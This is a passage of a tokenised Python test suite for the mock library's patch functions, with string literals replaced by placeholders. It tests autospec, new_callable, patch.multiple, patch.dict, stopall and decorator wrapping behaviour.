assertRaises ( AttributeError , getattr , function , '<STR_LIT:foo>' ) <EOL> test ( ) <EOL> def test_autospec_keywords ( self ) : <EOL> @ patch ( '<STR_LIT>' % __name__ , autospec = True , <EOL> return_value = <NUM_LIT:3> ) <EOL> def test ( mock_function ) : <EOL> return function ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> result = test ( ) <EOL> self . assertEqual ( result , <NUM_LIT:3> ) <EOL> def test_autospec_with_new ( self ) : <EOL> patcher = patch ( '<STR_LIT>' % __name__ , new = <NUM_LIT:3> , autospec = True ) <EOL> self . assertRaises ( TypeError , patcher . start ) <EOL> module = sys . modules [ __name__ ] <EOL> patcher = patch . object ( module , '<STR_LIT>' , new = <NUM_LIT:3> , autospec = True ) <EOL> self . assertRaises ( TypeError , patcher . start ) <EOL> def test_autospec_with_object ( self ) : <EOL> class Bar ( Foo ) : <EOL> extra = [ ] <EOL> patcher = patch ( foo_name , autospec = Bar ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsInstance ( mock , Bar ) <EOL> self . assertIsInstance ( mock . extra , list ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_autospec_inherits ( self ) : <EOL> FooClass = Foo <EOL> patcher = patch ( foo_name , autospec = True ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIsInstance ( mock , FooClass ) <EOL> self . assertIsInstance ( mock ( <NUM_LIT:3> ) , FooClass ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_autospec_name ( self ) : <EOL> patcher = patch ( foo_name , autospec = True ) <EOL> mock = patcher . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock . f ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ( None ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( mock ( None ) . f ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_tracebacks ( self ) : <EOL> @ patch . 
object ( Foo , '<STR_LIT:f>' , object ( ) ) <EOL> def test ( ) : <EOL> raise AssertionError <EOL> try : <EOL> test ( ) <EOL> except : <EOL> err = sys . exc_info ( ) <EOL> result = unittest . TextTestResult ( None , None , <NUM_LIT:0> ) <EOL> traceback = result . _exc_info_to_string ( err , self ) <EOL> self . assertIn ( '<STR_LIT>' , traceback ) <EOL> def test_new_callable_patch ( self ) : <EOL> patcher = patch ( foo_name , new_callable = NonCallableMagicMock ) <EOL> m1 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> m2 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertIsNot ( m1 , m2 ) <EOL> for mock in m1 , m2 : <EOL> self . assertNotCallable ( m1 ) <EOL> def test_new_callable_patch_object ( self ) : <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , new_callable = NonCallableMagicMock ) <EOL> m1 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> m2 = patcher . start ( ) <EOL> patcher . stop ( ) <EOL> self . assertIsNot ( m1 , m2 ) <EOL> for mock in m1 , m2 : <EOL> self . assertNotCallable ( m1 ) <EOL> def test_new_callable_keyword_arguments ( self ) : <EOL> class Bar ( object ) : <EOL> kwargs = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> Bar . kwargs = kwargs <EOL> patcher = patch ( foo_name , new_callable = Bar , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) <EOL> m = patcher . start ( ) <EOL> try : <EOL> self . assertIs ( type ( m ) , Bar ) <EOL> self . assertEqual ( Bar . kwargs , dict ( arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_new_callable_spec ( self ) : <EOL> class Bar ( object ) : <EOL> kwargs = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> Bar . kwargs = kwargs <EOL> patcher = patch ( foo_name , new_callable = Bar , spec = Bar ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Bar . kwargs , dict ( spec = Bar ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> patcher = patch ( foo_name , new_callable = Bar , spec_set = Bar ) <EOL> patcher . 
start ( ) <EOL> try : <EOL> self . assertEqual ( Bar . kwargs , dict ( spec_set = Bar ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_new_callable_create ( self ) : <EOL> non_existent_attr = '<STR_LIT>' % foo_name <EOL> p = patch ( non_existent_attr , new_callable = NonCallableMock ) <EOL> self . assertRaises ( AttributeError , p . start ) <EOL> p = patch ( non_existent_attr , new_callable = NonCallableMock , <EOL> create = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertNotCallable ( m , magic = False ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_new_callable_incompatible_with_new ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , patch , foo_name , new = object ( ) , new_callable = MagicMock <EOL> ) <EOL> self . assertRaises ( <EOL> ValueError , patch . object , Foo , '<STR_LIT:f>' , new = object ( ) , <EOL> new_callable = MagicMock <EOL> ) <EOL> def test_new_callable_incompatible_with_autospec ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , patch , foo_name , new_callable = MagicMock , <EOL> autospec = True <EOL> ) <EOL> self . assertRaises ( <EOL> ValueError , patch . object , Foo , '<STR_LIT:f>' , new_callable = MagicMock , <EOL> autospec = True <EOL> ) <EOL> def test_new_callable_inherit_for_mocks ( self ) : <EOL> class MockSub ( Mock ) : <EOL> pass <EOL> MockClasses = ( <EOL> NonCallableMock , NonCallableMagicMock , MagicMock , Mock , MockSub <EOL> ) <EOL> for Klass in MockClasses : <EOL> for arg in '<STR_LIT>' , '<STR_LIT>' : <EOL> kwargs = { arg : True } <EOL> p = patch ( foo_name , new_callable = Klass , ** kwargs ) <EOL> m = p . start ( ) <EOL> try : <EOL> instance = m . return_value <EOL> self . assertRaises ( AttributeError , getattr , instance , '<STR_LIT:x>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_new_callable_inherit_non_mock ( self ) : <EOL> class NotAMock ( object ) : <EOL> def __init__ ( self , spec ) : <EOL> self . 
spec = spec <EOL> p = patch ( foo_name , new_callable = NotAMock , spec = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertTrue ( is_instance ( m , NotAMock ) ) <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> self . assertEqual ( m . spec , Foo ) <EOL> def test_new_callable_class_decorating ( self ) : <EOL> test = self <EOL> original = Foo <EOL> class SomeTest ( object ) : <EOL> def _test ( self , mock_foo ) : <EOL> test . assertIsNot ( Foo , original ) <EOL> test . assertIs ( Foo , mock_foo ) <EOL> test . assertIsInstance ( Foo , SomeClass ) <EOL> def test_two ( self , mock_foo ) : <EOL> self . _test ( mock_foo ) <EOL> def test_one ( self , mock_foo ) : <EOL> self . _test ( mock_foo ) <EOL> SomeTest = patch ( foo_name , new_callable = SomeClass ) ( SomeTest ) <EOL> SomeTest ( ) . test_one ( ) <EOL> SomeTest ( ) . test_two ( ) <EOL> self . assertIs ( Foo , original ) <EOL> def test_patch_multiple ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher1 = patch . multiple ( foo_name , f = <NUM_LIT:1> , g = <NUM_LIT:2> ) <EOL> patcher2 = patch . multiple ( Foo , f = <NUM_LIT:1> , g = <NUM_LIT:2> ) <EOL> for patcher in patcher1 , patcher2 : <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:1> ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:2> ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> @ patch . multiple ( foo_name , f = <NUM_LIT:3> , g = <NUM_LIT:4> ) <EOL> def test ( ) : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:3> ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:4> ) <EOL> test ( ) <EOL> def test_patch_multiple_no_kwargs ( self ) : <EOL> self . 
assertRaises ( ValueError , patch . multiple , foo_name ) <EOL> self . assertRaises ( ValueError , patch . multiple , Foo ) <EOL> def test_patch_multiple_create_mocks ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . multiple ( foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT ) <EOL> def test ( f , foo ) : <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertEqual ( Foo . g , <NUM_LIT:3> ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> test ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create_mocks_different_order ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:3> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> other = patch . object ( Foo , '<STR_LIT:g>' , DEFAULT ) <EOL> other . attribute_name = '<STR_LIT:g>' <EOL> patcher . additional_patchers = [ other ] <EOL> @ patcher <EOL> def test ( g ) : <EOL> self . assertIs ( Foo . g , g ) <EOL> self . assertEqual ( Foo . f , <NUM_LIT:3> ) <EOL> test ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_stacked_decorators ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch . multiple ( foo_name , foo = DEFAULT ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> def test1 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> @ patch . 
multiple ( foo_name , foo = DEFAULT ) <EOL> def test2 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> @ patch ( foo_name + '<STR_LIT>' ) <EOL> @ patch . multiple ( foo_name , f = DEFAULT ) <EOL> @ patch . multiple ( foo_name , foo = DEFAULT ) <EOL> def test3 ( g , ** kwargs ) : <EOL> _test ( g , ** kwargs ) <EOL> def _test ( g , ** kwargs ) : <EOL> f = kwargs . pop ( '<STR_LIT:f>' ) <EOL> foo = kwargs . pop ( '<STR_LIT:foo>' ) <EOL> self . assertFalse ( kwargs ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertIs ( Foo . g , g ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( g , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> test1 ( ) <EOL> test2 ( ) <EOL> test3 ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create_mocks_patcher ( self ) : <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . multiple ( foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> f = result [ '<STR_LIT:f>' ] <EOL> foo = result [ '<STR_LIT:foo>' ] <EOL> self . assertEqual ( set ( result ) , set ( [ '<STR_LIT:f>' , '<STR_LIT:foo>' ] ) ) <EOL> self . assertIs ( Foo , original_foo ) <EOL> self . assertIs ( Foo . f , f ) <EOL> self . assertIs ( Foo . foo , foo ) <EOL> self . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> self . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_decorating_class ( self ) : <EOL> test = self <EOL> original_foo = Foo <EOL> original_f = Foo . f <EOL> original_g = Foo . 
g <EOL> class SomeTest ( object ) : <EOL> def _test ( self , f , foo ) : <EOL> test . assertIs ( Foo , original_foo ) <EOL> test . assertIs ( Foo . f , f ) <EOL> test . assertEqual ( Foo . g , <NUM_LIT:3> ) <EOL> test . assertIs ( Foo . foo , foo ) <EOL> test . assertTrue ( is_instance ( f , MagicMock ) ) <EOL> test . assertTrue ( is_instance ( foo , MagicMock ) ) <EOL> def test_two ( self , f , foo ) : <EOL> self . _test ( f , foo ) <EOL> def test_one ( self , f , foo ) : <EOL> self . _test ( f , foo ) <EOL> SomeTest = patch . multiple ( <EOL> foo_name , f = DEFAULT , g = <NUM_LIT:3> , foo = DEFAULT <EOL> ) ( SomeTest ) <EOL> thing = SomeTest ( ) <EOL> thing . test_one ( ) <EOL> thing . test_two ( ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_create ( self ) : <EOL> patcher = patch . multiple ( Foo , blam = '<STR_LIT>' ) <EOL> self . assertRaises ( AttributeError , patcher . start ) <EOL> patcher = patch . multiple ( Foo , blam = '<STR_LIT>' , create = True ) <EOL> patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Foo . blam , '<STR_LIT>' ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> self . assertFalse ( hasattr ( Foo , '<STR_LIT>' ) ) <EOL> def test_patch_multiple_spec_set ( self ) : <EOL> patcher = patch . multiple ( Foo , foo = DEFAULT , spec_set = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> self . assertEqual ( Foo . foo , result [ '<STR_LIT:foo>' ] ) <EOL> Foo . foo . a ( <NUM_LIT:1> ) <EOL> Foo . foo . b ( <NUM_LIT:2> ) <EOL> Foo . foo . a . assert_called_with ( <NUM_LIT:1> ) <EOL> Foo . foo . b . assert_called_with ( <NUM_LIT:2> ) <EOL> self . assertRaises ( AttributeError , setattr , Foo . foo , '<STR_LIT:c>' , None ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_patch_multiple_new_callable ( self ) : <EOL> class Thing ( object ) : <EOL> pass <EOL> patcher = patch . 
multiple ( <EOL> Foo , f = DEFAULT , g = DEFAULT , new_callable = Thing <EOL> ) <EOL> result = patcher . start ( ) <EOL> try : <EOL> self . assertIs ( Foo . f , result [ '<STR_LIT:f>' ] ) <EOL> self . assertIs ( Foo . g , result [ '<STR_LIT:g>' ] ) <EOL> self . assertIsInstance ( Foo . f , Thing ) <EOL> self . assertIsInstance ( Foo . g , Thing ) <EOL> self . assertIsNot ( Foo . f , Foo . g ) <EOL> finally : <EOL> patcher . stop ( ) <EOL> def test_nested_patch_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing1 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing2 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> def thing3 ( ) : <EOL> pass <EOL> for func in thing1 , thing2 , thing3 : <EOL> self . assertRaises ( AttributeError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_new_callable_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> original_foo = Foo . foo <EOL> def crasher ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing1 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . 
object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> def thing2 ( ) : <EOL> pass <EOL> @ patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> @ patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> def thing3 ( ) : <EOL> pass <EOL> for func in thing1 , thing2 , thing3 : <EOL> self . assertRaises ( NameError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> self . assertEqual ( Foo . foo , original_foo ) <EOL> def test_patch_multiple_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> good = patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> good . attribute_name = '<STR_LIT:g>' <EOL> bad = patch . object ( Foo , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> bad . attribute_name = '<STR_LIT>' <EOL> for additionals in [ good , bad ] , [ bad , good ] : <EOL> patcher . additional_patchers = additionals <EOL> @ patcher <EOL> def func ( ) : <EOL> pass <EOL> self . assertRaises ( AttributeError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> def test_patch_multiple_new_callable_failure ( self ) : <EOL> original_f = Foo . f <EOL> original_g = Foo . g <EOL> original_foo = Foo . foo <EOL> def crasher ( ) : <EOL> raise NameError ( '<STR_LIT>' ) <EOL> patcher = patch . object ( Foo , '<STR_LIT:f>' , <NUM_LIT:1> ) <EOL> patcher . attribute_name = '<STR_LIT:f>' <EOL> good = patch . object ( Foo , '<STR_LIT:g>' , <NUM_LIT:1> ) <EOL> good . attribute_name = '<STR_LIT:g>' <EOL> bad = patch . object ( Foo , '<STR_LIT:foo>' , new_callable = crasher ) <EOL> bad . attribute_name = '<STR_LIT:foo>' <EOL> for additionals in [ good , bad ] , [ bad , good ] : <EOL> patcher . 
additional_patchers = additionals <EOL> @ patcher <EOL> def func ( ) : <EOL> pass <EOL> self . assertRaises ( NameError , func ) <EOL> self . assertEqual ( Foo . f , original_f ) <EOL> self . assertEqual ( Foo . g , original_g ) <EOL> self . assertEqual ( Foo . foo , original_foo ) <EOL> def test_patch_multiple_string_subclasses ( self ) : <EOL> for base in ( str , unicode ) : <EOL> Foo = type ( '<STR_LIT>' , ( base , ) , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> foo = Foo ( ) <EOL> @ patch . multiple ( foo , fish = '<STR_LIT>' ) <EOL> def test ( ) : <EOL> self . assertEqual ( foo . fish , '<STR_LIT>' ) <EOL> test ( ) <EOL> self . assertEqual ( foo . fish , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT:foo>' ) <EOL> def test_patch_test_prefix ( self ) : <EOL> class Foo ( object ) : <EOL> thing = '<STR_LIT>' <EOL> def foo_one ( self ) : <EOL> return self . thing <EOL> def foo_two ( self ) : <EOL> return self . thing <EOL> def test_one ( self ) : <EOL> return self . thing <EOL> def test_two ( self ) : <EOL> return self . thing <EOL> Foo = patch . object ( Foo , '<STR_LIT>' , '<STR_LIT>' ) ( Foo ) <EOL> foo = Foo ( ) <EOL> self . assertEqual ( foo . foo_one ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . foo_two ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . test_one ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( foo . test_two ( ) , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT:bar>' ) <EOL> def test_patch_dict_test_prefix ( self ) : <EOL> class Foo ( object ) : <EOL> def bar_one ( self ) : <EOL> return dict ( the_dict ) <EOL> def bar_two ( self ) : <EOL> return dict ( the_dict ) <EOL> def test_one ( self ) : <EOL> return dict ( the_dict ) <EOL> def test_two ( self ) : <EOL> return dict ( the_dict ) <EOL> the_dict = { '<STR_LIT:key>' : '<STR_LIT>' } <EOL> Foo = patch . dict ( the_dict , key = '<STR_LIT>' ) ( Foo ) <EOL> foo = Foo ( ) <EOL> self . assertEqual ( foo . bar_one ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . 
assertEqual ( foo . bar_two ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( foo . test_one ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( foo . test_two ( ) , { '<STR_LIT:key>' : '<STR_LIT>' } ) <EOL> def test_patch_with_spec_mock_repr ( self ) : <EOL> for arg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , ** { arg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , repr ( m ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . class_attribute ) ) <EOL> self . assertIn ( "<STR_LIT>" , repr ( m ( ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m ( ) . class_attribute ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_nested_autospec_repr ( self ) : <EOL> p = patch ( '<STR_LIT>' , autospec = True ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . SomeClass . wibble ( ) ) ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> repr ( m . SomeClass ( ) . wibble ( ) ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_mock_calls_with_patch ( self ) : <EOL> for arg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , ** { arg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> m . wibble ( ) <EOL> kalls = [ call . wibble ( ) ] <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> self . assertEqual ( m . method_calls , kalls ) <EOL> self . assertEqual ( m . wibble . mock_calls , [ call ( ) ] ) <EOL> result = m ( ) <EOL> kalls . append ( call ( ) ) <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> result . wibble ( ) <EOL> kalls . append ( call ( ) . wibble ( ) ) <EOL> self . assertEqual ( m . mock_calls , kalls ) <EOL> self . assertEqual ( result . mock_calls , [ call . wibble ( ) ] ) <EOL> self . assertEqual ( result . wibble . mock_calls , [ call ( ) ] ) <EOL> self . assertEqual ( result . method_calls , [ call . 
wibble ( ) ] ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_imports_lazily ( self ) : <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> p1 = patch ( '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , p1 . start ) <EOL> squizz = Mock ( ) <EOL> squizz . squozz = <NUM_LIT:6> <EOL> sys . modules [ '<STR_LIT>' ] = squizz <EOL> p1 = patch ( '<STR_LIT>' ) <EOL> squizz . squozz = <NUM_LIT:3> <EOL> p1 . start ( ) <EOL> p1 . stop ( ) <EOL> self . assertEqual ( squizz . squozz , <NUM_LIT:3> ) <EOL> def test_patch_propogrates_exc_on_exit ( self ) : <EOL> class holder : <EOL> exc_info = None , None , None <EOL> class custom_patch ( _patch ) : <EOL> def __exit__ ( self , etype = None , val = None , tb = None ) : <EOL> _patch . __exit__ ( self , etype , val , tb ) <EOL> holder . exc_info = etype , val , tb <EOL> stop = __exit__ <EOL> def with_custom_patch ( target ) : <EOL> getter , attribute = _get_target ( target ) <EOL> return custom_patch ( <EOL> getter , attribute , DEFAULT , None , False , None , <EOL> None , None , { } <EOL> ) <EOL> @ with_custom_patch ( '<STR_LIT>' ) <EOL> def test ( mock ) : <EOL> raise RuntimeError <EOL> self . assertRaises ( RuntimeError , test ) <EOL> self . assertIs ( holder . exc_info [ <NUM_LIT:0> ] , RuntimeError ) <EOL> self . assertIsNotNone ( holder . exc_info [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' ) <EOL> self . assertIsNotNone ( holder . exc_info [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' ) <EOL> def test_create_and_specs ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( '<STR_LIT>' % __name__ , create = True , <EOL> ** { kwarg : True } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertRaises ( NameError , lambda : doesnotexist ) <EOL> p = patch ( MODNAME , create = True , ** { kwarg : True } ) <EOL> p . start ( ) <EOL> p . 
stop ( ) <EOL> def test_multiple_specs ( self ) : <EOL> original = PTModule <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , autospec = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec_set = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec = <NUM_LIT:0> , ** { kwarg : <NUM_LIT:0> } ) <EOL> self . assertRaises ( TypeError , p . start ) <EOL> self . assertIs ( PTModule , original ) <EOL> def test_specs_false_instead_of_none ( self ) : <EOL> p = patch ( MODNAME , spec = False , spec_set = False , autospec = False ) <EOL> mock = p . start ( ) <EOL> try : <EOL> mock . does_not_exist <EOL> mock . does_not_exist = <NUM_LIT:3> <EOL> finally : <EOL> p . stop ( ) <EOL> def test_falsey_spec ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , ** { kwarg : <NUM_LIT:0> } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_spec_set_true ( self ) : <EOL> for kwarg in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> p = patch ( MODNAME , spec_set = True , ** { kwarg : True } ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertRaises ( AttributeError , setattr , m , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( AttributeError , getattr , m , '<STR_LIT>' ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_callable_spec_as_list ( self ) : <EOL> spec = ( '<STR_LIT>' , ) <EOL> p = patch ( MODNAME , spec = spec ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertTrue ( callable ( m ) ) <EOL> finally : <EOL> p . 
stop ( ) <EOL> def test_not_callable_spec_as_list ( self ) : <EOL> spec = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> p = patch ( MODNAME , spec = spec ) <EOL> m = p . start ( ) <EOL> try : <EOL> self . assertFalse ( callable ( m ) ) <EOL> finally : <EOL> p . stop ( ) <EOL> def test_patch_stopall ( self ) : <EOL> unlink = os . unlink <EOL> chdir = os . chdir <EOL> path = os . path <EOL> patch ( '<STR_LIT>' , something ) . start ( ) <EOL> patch ( '<STR_LIT>' , something_else ) . start ( ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def patched ( mock_path ) : <EOL> patch . stopall ( ) <EOL> self . assertIs ( os . path , mock_path ) <EOL> self . assertIs ( os . unlink , unlink ) <EOL> self . assertIs ( os . chdir , chdir ) <EOL> patched ( ) <EOL> self . assertIs ( os . path , path ) <EOL> def test_wrapped_patch ( self ) : <EOL> decorated = patch ( '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_several_times_patch ( self ) : <EOL> decorated = patch ( '<STR_LIT>' ) ( function ) <EOL> decorated = patch ( '<STR_LIT>' ) ( decorated ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_patch_object ( self ) : <EOL> decorated = patch . object ( sys , '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function ) <EOL> def test_wrapped_patch_dict ( self ) : <EOL> decorated = patch . dict ( '<STR_LIT>' ) ( function ) <EOL> self . assertIs ( decorated . __wrapped__ , function 